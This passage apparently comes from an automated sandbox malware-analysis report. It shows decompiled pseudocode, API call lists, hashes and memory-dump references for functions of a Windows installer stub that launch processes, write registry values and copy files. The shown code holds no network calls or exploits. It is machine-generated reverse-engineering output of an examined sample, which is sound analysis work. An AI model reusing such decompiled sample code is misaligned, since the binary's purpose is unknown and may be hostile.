				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405D18(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405939(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                                          0x00401ea2
                                                                          0x00401ea7
                                                                          0x00401eb2
                                                                          0x00401eb9
                                                                          0x00401ebc
                                                                          0x004026da
                                                                          0x00401ec2
                                                                          0x00401ec5
                                                                          0x00401ed6
                                                                          0x00401ed1
                                                                          0x00401ed1
                                                                          0x00401eeb
                                                                          0x00401ef4
                                                                          0x00401f04
                                                                          0x00401f06
                                                                          0x00401f06
                                                                          0x00401ef6
                                                                          0x00401efa
                                                                          0x00401efa
                                                                          0x00401ef4
                                                                          0x00401f0d
                                                                          0x00401f10
                                                                          0x00401f10
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                            • Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,74B5EA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
                                                                            • Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,74B5EA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
                                                                            • Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,74B5EA30), ref: 00404DDA
                                                                            • Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E12
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E2C
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E3A
                                                                            • Part of subcall function 00405263: GetFileAttributesA.KERNEL32(?), ref: 00405276
                                                                            • Part of subcall function 00405263: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0042C8A8,00000000), ref: 0040529F
                                                                            • Part of subcall function 00405263: CloseHandle.KERNEL32(?), ref: 004052AC
                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                                                          • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                                                          • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                          • API String ID: 4003922372-501415292
                                                                          • Opcode ID: 5a5e0ab474501c0c8cdce6a7dad8f641a45737d556ca6cc8df0d2412e5647019
                                                                          • Instruction ID: 5373abc2601613a98f28ad4f4965e42200fdcae42bb0af3ca7e989b3915abbb6
                                                                          • Opcode Fuzzy Hash: 5a5e0ab474501c0c8cdce6a7dad8f641a45737d556ca6cc8df0d2412e5647019
                                                                          • Instruction Fuzzy Hash: 7F018031904119EBCF12AFE1DD85A9E7672EF00355F20403BF201B61E1D3B94A419F9E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405263, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31processCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00405263(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				signed char _t10;
				int _t12;

				0x42c8a8->cb = 0x44;
				_t10 = GetFileAttributesA(_a8);
				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
					_a8 = 0;
				}
				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x42c8a8,  &_v20);
				if(_t12 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t12;
			}






                                                                          0x0040526c
                                                                          0x00405276
                                                                          0x00405281
                                                                          0x00405287
                                                                          0x00405287
                                                                          0x0040529f
                                                                          0x004052a7
                                                                          0x004052ac
                                                                          0x00000000
                                                                          0x004052b2
                                                                          0x004052b6

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(?), ref: 00405276
                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0042C8A8,00000000), ref: 0040529F
                                                                          • CloseHandle.KERNEL32(?), ref: 004052AC
                                                                          Strings
                                                                          • Error launching installer, xrefs: 00405263
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: AttributesCloseCreateFileHandleProcess
                                                                          • String ID: Error launching installer
                                                                          • API String ID: 2000254098-66219284
                                                                          • Opcode ID: b954777e46e2876cd2b16df8f0a664f49a3cb908b9b64b83fc78111bb65668c0
                                                                          • Instruction ID: 569e459230bed8030f36cb91adc98a8a2728fe2275d92c1c3a76062f46c74d15
                                                                          • Opcode Fuzzy Hash: b954777e46e2876cd2b16df8f0a664f49a3cb908b9b64b83fc78111bb65668c0
                                                                          • Instruction Fuzzy Hash: 7AF01C70900209AFDB046FA4DC49AAF7B64FF04315B50862AFD25A52E0E739E5158F69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004054E8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004054E8(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                          0x004054e9
                                                                          0x00405500
                                                                          0x00405508
                                                                          0x00405508
                                                                          0x00405510

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403150,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 004054EE
                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403150,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 004054F7
                                                                          • lstrcatA.KERNEL32(?,00409010), ref: 00405508
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004054E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2659869361-3916508600
                                                                          • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                          • Instruction ID: b17aae5b68b8bc80d4c61b0fd94ca46693d6836576485c9dca8ad087ab612ca9
                                                                          • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                          • Instruction Fuzzy Hash: 7BD0A9A2609A70BAD20227599C05E8B2A18CF46320B040022F140B22D2C23C1D81DFEE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402386, Relevance: 6.1, APIs: 4, Instructions: 69registrystringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 85%
                                                                          			E00402386(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t33;
				void* _t35;

				_t15 = E00402B61(__eax);
				_t33 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9A(2);
				_t18 = E00402A9A(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t33 == 1) {
						E00402A9A(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t33 == 4) {
						_t24 = E00402A7D(3);
						 *0x40a440 = _t24;
						_t19 = _t33;
					}
					if(_t33 == 3) {
						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a440, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *(_t35 - 4);
				return 0;
			}










                                                                          0x00402387
                                                                          0x0040238c
                                                                          0x00402396
                                                                          0x004023a0
                                                                          0x004023a3
                                                                          0x004023b5
                                                                          0x004023bc
                                                                          0x004023c4
                                                                          0x004023d2
                                                                          0x004023d6
                                                                          0x004023e1
                                                                          0x004023e1
                                                                          0x004023e5
                                                                          0x004023e9
                                                                          0x004023ef
                                                                          0x004023f4
                                                                          0x004023f4
                                                                          0x004023f8
                                                                          0x00402404
                                                                          0x00402404
                                                                          0x0040241d
                                                                          0x0040241f
                                                                          0x0040241f
                                                                          0x00402422
                                                                          0x004024fb
                                                                          0x004024fb
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                                                          • lstrlenA.KERNEL32(0040A440,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,0040A440,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A440,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CloseCreateValuelstrlen
                                                                          • String ID:
                                                                          • API String ID: 1356686001-0
                                                                          • Opcode ID: 56d13097dc24f25ff427fc816b00db1f9c4e98885d62d1f8789f5a0823319cc5
                                                                          • Instruction ID: 1c94cea9ba90df93ca58bd4285a9e0d6cf73b35acad62412febfb939eac80851
                                                                          • Opcode Fuzzy Hash: 56d13097dc24f25ff427fc816b00db1f9c4e98885d62d1f8789f5a0823319cc5
                                                                          • Instruction Fuzzy Hash: 1111AFB1E00208BFEB10AFA5DE4DEAF767CEB50758F10003AF904B61C1D6B85D019A69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401F4B, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 85%
                                                                          			E00401F4B(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9A(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E00405939(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E00405939(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}






                                                                          0x00401f50
                                                                          0x00401f53
                                                                          0x00401f5b
                                                                          0x00401f60
                                                                          0x00401f65
                                                                          0x00401f69
                                                                          0x00401f6c
                                                                          0x00401f6e
                                                                          0x00401f75
                                                                          0x00401f7e
                                                                          0x00401f86
                                                                          0x00401f89
                                                                          0x00401f9e
                                                                          0x00401fa4
                                                                          0x00401fb7
                                                                          0x00401fc0
                                                                          0x00401fcc
                                                                          0x00401fd1
                                                                          0x00401fd1
                                                                          0x00401fb7
                                                                          0x00401fd4
                                                                          0x00401be1
                                                                          0x00401be1
                                                                          0x00401f89
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                                                          • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                                                            • Part of subcall function 00405939: wsprintfA.USER32 ref: 00405946
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                          • String ID:
                                                                          • API String ID: 1404258612-0
                                                                          • Opcode ID: 41675a64441fc20307d915f0227df61db49755b7bd11a5d40871c3fee6e4e729
                                                                          • Instruction ID: e4d099bb47c36cba02d0065e41ba721c83b3d665ff7f953a0667131b869b9819
                                                                          • Opcode Fuzzy Hash: 41675a64441fc20307d915f0227df61db49755b7bd11a5d40871c3fee6e4e729
                                                                          • Instruction Fuzzy Hash: 1F1116B1900108EEDB01DFE5D9859EEBBB9EF04344F20803AF501F61A1D7789A54DB28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004021F6, Relevance: 6.1, APIs: 4, Instructions: 51stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 92%
                                                                          			E004021F6() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t38;
				void* _t40;

				_t35 = E00402A9A(_t33);
				 *(_t40 + 8) = _t35;
				_t38 = E00402A9A(0x11);
				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
				E004059FD(_t33, 0x40a440, _t38, 0x40a440, 0xfffffff8);
				lstrcatA(0x40a440, _t38);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t38;
				 *(_t40 - 0x4a) = 0x40a440;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D7E(_t33, 0x40a440);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D7E(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}








                                                                          0x004021fc
                                                                          0x00402200
                                                                          0x00402208
                                                                          0x0040220e
                                                                          0x00402211
                                                                          0x0040221e
                                                                          0x0040222f
                                                                          0x00402233
                                                                          0x0040223a
                                                                          0x00402243
                                                                          0x0040224b
                                                                          0x0040224e
                                                                          0x00402251
                                                                          0x00402255
                                                                          0x00402266
                                                                          0x0040226f
                                                                          0x004026da
                                                                          0x004026da
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • lstrlenA.KERNEL32 ref: 00402218
                                                                          • lstrlenA.KERNEL32(00000000), ref: 00402222
                                                                          • lstrcatA.KERNEL32(0040A440,00000000,0040A440,000000F8,00000000), ref: 0040223A
                                                                            • Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,74B5EA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
                                                                            • Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,74B5EA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
                                                                            • Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,74B5EA30), ref: 00404DDA
                                                                            • Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E12
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E2C
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E3A
                                                                          • SHFileOperationA.SHELL32(?,?,0040A440,0040A440,00000000,0040A440,000000F8,00000000), ref: 0040225E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                                          • String ID:
                                                                          • API String ID: 3674637002-0
                                                                          • Opcode ID: c237d85bab7d5b7f9d91a756771a76c1e0cf33c16846e85dec699fb32a0fce7f
                                                                          • Instruction ID: 7d0402f7bcad65a2a3fbaa89d286b4c3fac030f19c38f74fe4853062ba68fef2
                                                                          • Opcode Fuzzy Hash: c237d85bab7d5b7f9d91a756771a76c1e0cf33c16846e85dec699fb32a0fce7f
                                                                          • Instruction Fuzzy Hash: 6E1186B1904259ABCB00EFEA894499EB7F8DF45314F10413BB114FB2D1D678C945DB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401D8E, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 61%
                                                                          			E00401D8E() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x409400->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
				 *0x409410 = E00402A7D(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x409417 = 1;
				 *0x409414 = _t11 & 0x00000001;
				 *0x409415 = _t11 & 0x00000002;
				 *0x409416 = _t11 & 0x00000004;
				E004059FD(_t18, _t24, _t26, 0x40941c,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x409400);
				_push(_t14);
				_push(_t26);
				E00405939();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                          0x00401d9c
                                                                          0x00401db5
                                                                          0x00401dbf
                                                                          0x00401dc4
                                                                          0x00401dcf
                                                                          0x00401dd6
                                                                          0x00401de8
                                                                          0x00401dee
                                                                          0x00401df3
                                                                          0x00401dfd
                                                                          0x00402536
                                                                          0x00401581
                                                                          0x004028d7
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00401D95
                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                                                          • CreateFontIndirectA.GDI32(00409400), ref: 00401DFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirect
                                                                          • String ID:
                                                                          • API String ID: 3272661963-0
                                                                          • Opcode ID: 921b8d9f80d85dae4e5c0b3fab4b65544386c45d95e077db1074512b697c4466
                                                                          • Instruction ID: 0bf8db4aad66ff6bc29ff827cc3fc14c5ec2529e919bd09f72257f1192ea8504
                                                                          • Opcode Fuzzy Hash: 921b8d9f80d85dae4e5c0b3fab4b65544386c45d95e077db1074512b697c4466
                                                                          • Instruction Fuzzy Hash: B0F0627194C650BFE7015BB0AE1ABAA3F64A755305F148479F241BA1E3C7BC0906CB7E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040380E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 86%
                                                                          			E0040380E(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405952(__ecx, "1033");
				while(1) {
					_t26 =  *0x42f464;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x42f428 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42f460;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42ec00 = _t18[1];
					 *0x42f4c8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42ebfc = _t23;
						E00405939(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a880, E004059FD(_t13, _t24, _t26, "obsolete Setup", 0xfffffffe));
						_t11 =  *0x42f44c;
						_t27 =  *0x42f448;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E004059FD(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                          0x00403812
                                                                          0x00403817
                                                                          0x0040381d
                                                                          0x00403822
                                                                          0x00403822
                                                                          0x0040382a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403832
                                                                          0x0040383a
                                                                          0x0040383c
                                                                          0x00403842
                                                                          0x00403842
                                                                          0x00403844
                                                                          0x00403850
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403854
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403856
                                                                          0x0040385b
                                                                          0x00403864
                                                                          0x0040386a
                                                                          0x0040386f
                                                                          0x00403883
                                                                          0x0040388e
                                                                          0x004038a6
                                                                          0x004038ac
                                                                          0x004038b1
                                                                          0x004038b9
                                                                          0x004038da
                                                                          0x004038da
                                                                          0x004038da
                                                                          0x004038bb
                                                                          0x004038bd
                                                                          0x004038bd
                                                                          0x004038c1
                                                                          0x004038c8
                                                                          0x004038c8
                                                                          0x004038cd
                                                                          0x004038d3
                                                                          0x004038d3
                                                                          0x00000000
                                                                          0x004038bd
                                                                          0x00403871
                                                                          0x00403876
                                                                          0x0040387f
                                                                          0x00403878
                                                                          0x00403878
                                                                          0x00403878
                                                                          0x00403876

                                                                          APIs
                                                                          • SetWindowTextA.USER32(00000000,obsolete Setup), ref: 004038A6
                                                                          Strings
                                                                          Memory Dump Source
